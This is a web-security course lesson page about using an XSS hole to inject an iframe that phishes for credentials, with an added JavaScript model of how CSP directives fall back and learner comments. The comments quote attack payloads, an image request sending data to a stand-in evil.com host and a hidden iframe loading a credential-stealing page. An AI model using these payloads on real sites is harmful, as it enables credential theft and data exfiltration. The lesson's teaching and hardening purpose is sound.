Prompt Users for Credentials from a Vulnerable Website via iframe Injection
Lesson 16 (1m 36s)

Instructor: Mike Sherov

In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading an iframe from the attacker's website. This demonstrates that even though we've already mitigated JS-based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!
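To see why a policy that only restricts scripts still lets the injected iframe load, here is a small model of the directive fallback a browser applies when deciding which CSP directive governs a load. This is an added illustration, not the lesson's code: the page origin `https://app.example`, the two policy strings and the resource URLs are constructed for the example (the `evil.com:666` host is the one named in the comments below). A frame load is governed by `frame-src`, falling back to `child-src` and then `default-src`; if none of those is present, CSP does not restrict it at all, which is exactly the gap a `script-src`-only policy leaves open.

```javascript
// Added example (not from the lesson): minimal model of CSP directive fallback.
// Policy strings, page origin and URLs below are constructed for illustration.

// Directive lookup order per resource type, most specific first (CSP3 fallback rules).
const FALLBACK_CHAIN = {
  script: ['script-src', 'default-src'],
  frame: ['frame-src', 'child-src', 'default-src'],
  img: ['img-src', 'default-src'],
};

// Parse "directive src src; directive src" into { directive: [sources] }.
function parsePolicy(header) {
  const policy = {};
  for (const clause of header.split(';')) {
    const tokens = clause.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Does one source expression permit the URL? Handles 'self', 'none', '*' and
// scheme://host[:port] sources; nonces, hashes and wildcard hosts are left out.
function sourceAllows(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return new URL(url).origin === pageOrigin;
  if (s === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:\/\//.test(s)) {
    return new URL(url).origin === new URL(s).origin;
  }
  return false; // a form this model does not understand: treat as not matching
}

// True when the policy lets a resource of the given type load from url.
function isLoadAllowed(header, pageOrigin, fetchType, url) {
  const policy = parsePolicy(header);
  for (const directive of FALLBACK_CHAIN[fetchType]) {
    if (directive in policy) {
      return policy[directive].some((src) => sourceAllows(src, url, pageOrigin));
    }
  }
  return true; // no governing directive at all: CSP imposes no restriction
}

const PAGE = 'https://app.example'; // constructed page origin
const EVIL_FRAME = 'https://evil.com:666/steal.html';
const EVIL_SCRIPT = 'https://evil.com:666/hook.js'; // constructed URL

// Policy that only locks down scripts: stops an injected <script>, not an injected <iframe>.
const SCRIPT_ONLY_CSP = "script-src 'self'";
// Policy with a default plus an explicit frame directive: stops both.
const HARDENED_CSP = "default-src 'self'; script-src 'self'; frame-src 'none'";

function summarize(header) {
  return {
    evilScript: isLoadAllowed(header, PAGE, 'script', EVIL_SCRIPT),
    evilFrame: isLoadAllowed(header, PAGE, 'frame', EVIL_FRAME),
    selfScript: isLoadAllowed(header, PAGE, 'script', `${PAGE}/app.js`),
  };
}

console.log('script-src only:', summarize(SCRIPT_ONLY_CSP));
console.log('hardened:       ', summarize(HARDENED_CSP));
```

Running it shows `evilFrame: true` under the script-only policy and `false` once a `default-src` (or explicit `frame-src`) is present, while the site's own script stays allowed in both cases. The practical check is to read your deployed header and confirm every resource type your page should never load from elsewhere is covered, either by its specific directive or by a restrictive `default-src`.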

Gheorghe, ~10 months ago

typo: 'propmt' should be -> 'prompt'

Gheorghe, ~10 months ago

at payload level: img.src = https://evel.com:666/hijack?payload=${payload} should be img.src = https://evil.com:666/hijack?payload=${payload}

Gheorghe, ~10 months ago

I guess that 'payload', this time, should be only:

<iframe hidden src="https://evil.com:666/steal.html"></iframe>

Lucas Minter, ~5 months ago

Thanks for this! I got the transcripts updated!